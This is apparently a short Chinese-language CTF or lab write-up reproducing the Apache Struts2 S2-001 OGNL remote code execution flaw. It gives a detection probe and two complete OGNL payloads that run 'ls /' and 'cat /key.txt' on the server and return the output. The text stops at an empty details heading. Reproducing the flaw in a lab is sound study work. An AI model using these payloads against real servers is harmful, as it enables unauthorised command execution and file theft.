0x1F. Apache Struts2远程代码执行漏洞(S2-001)复现
s2-001:WebWork 2.1+和Struts 2的“ altSyntax”功能允许将OGNL表达式插入文本字符串并进行递归处理。这允许恶意用户通常通过HTML文本字段提交包含OGNL表达式的字符串,如果表单验证失败,该字符串将由服务器执行;
通过账号处输入%{1+2}提交后得到返回值 3可判断出s2-001漏洞;
通过构造poc得到查看根目录,发现key文件;
poc:
%{#a=(new java.lang.ProcessBuilder(new java.lang.String[]{"ls","/"})).redirectErrorStream(true).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#f=#context.get("com.opensymphony.xwork2.dispatcher.HttpServletResponse"),#f.getWriter().println(new java.lang.String(#e)),#f.getWriter().flush(),#f.getWriter().close()}
构造poc查看key文件可得到key值;
poc:
%{#a=(new java.lang.ProcessBuilder(new java.lang.String[]{"cat","/key.txt"})).redirectErrorStream(true).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#f=#context.get("com.opensymphony.xwork2.dispatcher.HttpServletResponse"),#f.getWriter().println(new java.lang.String(#e)),#f.getWriter().flush(),#f.getWriter().close()}
漏洞详情: